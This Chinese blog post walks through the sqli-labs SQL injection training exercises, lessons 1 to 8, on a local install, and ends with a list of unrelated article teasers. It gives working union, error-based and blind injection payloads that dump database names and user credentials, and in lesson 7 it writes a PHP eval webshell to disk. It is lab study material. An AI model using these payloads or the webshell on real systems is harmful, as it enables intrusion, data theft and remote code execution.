这是抄袭你们  铃兰师姐总结的,尽管她很不情愿。

(现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!)

less-1:

1、获取当前数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select database())--+

SELECT * FROM users WHERE id='' union select 1,2,(select database())-- ' LIMIT 0,1

Your Login name:2

Your Password:security

当前数据库名:security

2、获取所有数据库名

?id=' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ' LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

3、获取表名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

//0x7365637572697479  为数据库名(security)的16进制形式

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ' LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

数据库security中的表名:emails,referers,uagents,users

4、获取列名

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

//0x7573657273 表名:users

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ' LIMIT 0,1

Your Login name:2

Your Password:id,username,password

列名:id,username,password

5、获取数据

http://127.0.0.1/sqli-labs/Less-1/?id=' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

//0X7c:空格

SELECT * FROM users WHERE id='' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ' LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

数据:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

6、读取数据库路径/获取安装路径

http://localhost/sqli-labs-master/less-1/?id=0' union select 1,@@datadir,@@basedir--+

Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\

Your Password:D:/wamp/bin/mysql/mysql5.6.12

数据库路径:D:\wamp\bin\mysql\mysql5.6.12\data\

mysql安装路径:D:/wamp/bin/mysql/mysql5.6.12

Less-2:

1、获取列数:

http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+

SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1

Unknown column '4' in 'order clause'

(共有三列)

2、获取数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' ' union select  1,2,(select database())--+

("id="后面为两个单引号)

SELECT * FROM users WHERE id=' ' union select 1,2,(select database())-- LIMIT 0,1

Your Login name:2

Your Password:security

数据库:security

3、获取所有数据库名称:

http://localhost/sqli-labs-master/less-2/?id=' '

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1

Your Login name:2 Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

所有数据库名称:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

4、获取表名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

表0x7365637572697479(security)中的表有:emails,referers,uagents,users

5、获取列名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1

Your Login name:2

Your Password:id,username,password

数据库security中表users的列名称:id,username,password

6、获取表中数据:

http://localhost/sqli-labs-master/less-2/?id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

SELECT * FROM users WHERE id=' ' union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|p@ssword,4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

Less-3

1.获取列数:

http://localhost/sqli-labs-master/less-3/?id=1') order by 1,2,3,4--+

SELECT * FROM users WHERE id=('1') order by 1,2,3,4-- ') LIMIT 0,1

Unknown column '4' in 'order clause'

2.@@datadir 读取数据库路径;@@basedir  获取mysql安装路径

http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+

之后方法类似less-1和less-2!!!

Less-4

1、获取列数:

http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+

SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1

Unknown column '4' in 'order clause'

2、获取数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+

3、所有数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+

4、获取表名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

5、获取列名:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

6、获取数据

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+

Less-5:(二分法)

1.获取列数:

http://localhost/sqli-labs-master/less-5/?id=' order by 4--+

共四列: Unknown column '4' in 'order clause'

2、报错得到数据库的个数:

http://localhost/sqli-labs-master/less-5/?id=1'+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~11~~:~~1' for key 'group_key'

==>>共十一个数据库

2.报错得到数据库名:

http://localhost/sqli-labs-master/less-5/

?id=1' and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+

Duplicate entry '~~:~~security~~:~~1' for key 'group_key'

==>第九个数据库名为 security

3.报错得到表名:

首先得到表的个数:

/less-5/?id=1' and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

==>Duplicate entry '~~:~~4~~:~~1' for key 'group_key'

共有四个表

依次得到表的名字:

?id=1' and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables  where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Duplicate entry '~~:~~users~~:~~1' for key 'group_key'

2.获取数据库版本号:

http://localhost/sqli-labs-master/less-5/?id=1' and left(version(),1)=5--+

left(string,n)函数:提取字符串string左边的n个字符。

3.利用length()获取数据库长度:

http://localhost/sqli-labs-master/less-5/?id=1' and length(database())=8 --+

数据名长度为8;

4.奇怪:

http://localhost/sqli-labs-master/less-5/?id=1' and length(db())=8 --+

结果:FUNCTION security.db does not exist

5.获取数据库名字:使用二分法获取其各个字母

http://localhost/sqli-labs-master/less-5/?id=1' and left(database(),1) >'s'--+

第一个字母为s;

http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+

前两个字母为se;

依次类推。。。

6.获取数据库security 数据库的第一表的第一个字符:

首先得出数据库的第一个表的长度:

http://localhost/sqli-labs-master//Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

长度为6;

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema=database() limit 0,1),1,1))>101--+

/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables  where table_schema='security' limit 0,1),1,1))>101--+

第一个字母为e;

/Less-5/?id=1' and length(select table_name from information_schema.tables where table_schema =database() limit 0,1)>10--+

Less-7 :

1.创建一个木马文件7.php,连接菜刀(必须知道数据库的用户名和密码),然后管理数据库即可得到数据库内容

http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+

less-8:

盲注需要掌握一些MySQL的相关函数:

length(str):返回str字符串的长度。

substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii码

if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

首先要记得常见的ASCII,A:65,Z:90 a:97,z:122,  0:48, 9:57

首先select database()查询数据库

ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii码

ascii(substr((select database()),1,1))>64:ascii大于64就返回true,if就返回1,否则返回0

ps:(你们铃兰师姐会持续更新的)

sqli-libs的更多相关文章

  1. sqli篇-本着就了解安全本质的想法,尽可能的用通俗易懂的语言去解释安全漏洞问题

    前言 最早接触安全也是从xss攻击和sql注入攻击开始的. 和xss一样屡居OWASPtop10 前三名的漏洞,sqli(sql Injection)sql注入攻击也是web安全中影响较大和影响范围较 ...

  2. 编译gtk+程序报错gcc: pkg-config --cflags --libs gtk+-2.0: 没有那个文件或目录

    第一次接触gtk+.在网上搜罗良一番,装好相应的库后,编写了第一hello程序.在编译时输入以下命令:gcc -o hello hello.c 'pkg-config --cflags --libs ...

  3. Play libs

    The play.libs package contains several useful libraries that will help you to achieve common program ...

  4. Android中libs目录下armeabi和armeabi-v7a的区别

    armeabi默认选项,支持基于 ARM* v5TE 的设备支持软浮点运算(不支持硬件辅助的浮点计算)支持所有 ARM* 设备 armeabi-v7a支持基于 ARM* v7 的设备支持硬件 FPU ...

  5. SQLi filter evasion cheat sheet (MySQL)

    This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 y ...

  6. python INFO: Can't locate Tcl/Tk libs and/or headers

    安装opencv的时候遇到这个错误: python INFO: Can't locate Tcl/Tk libs and/or headers 参考如下文章解决这个问题: http://www.ver ...

  7. 如何为libs目录下的jar包关联源代码

    以前,我们可以为lib目录下的jar包关联源代码,但是现在似乎不行了. 下面是一篇讲述此问题解决方法的文章: How to attach javadoc or sources to jars in l ...

  8. Makefile选项CFLAGS,LDFLAGS,LIBS

    CFLAGS 表示用于 C 编译器的选项, CXXFLAGS 表示用于 C++ 编译器的选项.这两个变量实际上涵盖了编译和汇编两个步骤. CFLAGS: 指定头文件(.h文件)的路径,如:CFLAGS ...

  9. Android studio libs目录

    Android studio libs目录: 关于Android studio libs目录,Android studio 已经为我们自动生成了,如果默认 是看不到默认Libs目录的,点击红色按钮地方 ...

  10. 写你自己 android 多通道打包工具 可以包libs和.so文件

    android上传应用程序,需要区分各个信道. 通常更改配置文件中的一个通道id,假设有多个通道,手动更改并生成apk这将是非常麻烦的,及增加误差的概率. 在这个课堂上分享一个打包工具.也可在网上类似 ...

随机推荐

  1. AspectCore中的IoC容器和依赖注入

    IOC模式和依赖注入是近年来非常流行的一种模式,相信大家都不陌生了,在Asp.Net Core中提供了依赖注入作为内置的基础设施,如果仍不熟悉依赖注入的读者,可以看看由我们翻译的Asp.Net Cor ...

  2. Selenium 设置浏览器下载 Firefox 和Chrome

    当我们在使用Selenium运行自动化测试时,偶尔需要用到下载功能,但浏览器的下载可能会弹出下载窗口,或者下载路径不是我们想要保存的位置,所以在通过Selenium启动浏览器时需要做相关的设置,将使这 ...

  3. Python学习笔记(八)

    Python学习笔记(八): 复习回顾 递归函数 内置函数 1. 复习回顾 1. 深浅拷贝 2. 集合 应用: 去重 关系操作:交集,并集,差集,对称差集 操作: 定义 s1 = set('alvin ...

  4. (七)php运算符

    一:算数运算符 +(加).-(减).*(成)./(除) %(取模,求余的意思) <?php $a=7/3; echo $a; //2.3333333333333.因为float类型的最大精度为1 ...

  5. php mysqli MySQL server has gone away 问题分析

    结论 mysqli没有处理对端(MySQL server)的断开请求.在send时,收到对端(MySQL server)的RST,会打印MySQL server has gone away. 环境 x ...

  6. LeetCode 404. Sum of Left Leaves (左子叶之和)

    Find the sum of all left leaves in a given binary tree. Example: 3 / \ 9 20 / \ 15 7 There are two l ...

  7. PHP中的封装和继承

    1. 封装 1.1什么是封装? 通过访问修饰符,将类中的属性和方法进行私有化处理,并提供唯一的设置和读取的 set/get方法,以实现访问控制.这个过程称为封装. 注意:是实现访问控制,而不是拒绝访问 ...

  8. 使用prettytable美化python的print输出

    经常碰到需要将一些数据用表格形式输出来.自己手动写太麻烦. 用prettytable能很好解决这个问题. ...(未完)

  9. request的getServletPath(),getContextPath(),getRequestURI(),getRealPath("/")区别

    假定你的web application 名称为news,你在浏览器中输入请求路径: http://localhost:8080/news/main/list.jsp 则执行下面向行代码后打印出如下结果 ...

  10. 火狐浏览器打开html文件,中文乱码

    当html文件为: 解决方法: 将   <meta http-equiv="Content-Type" content="text/html; charset=UT ...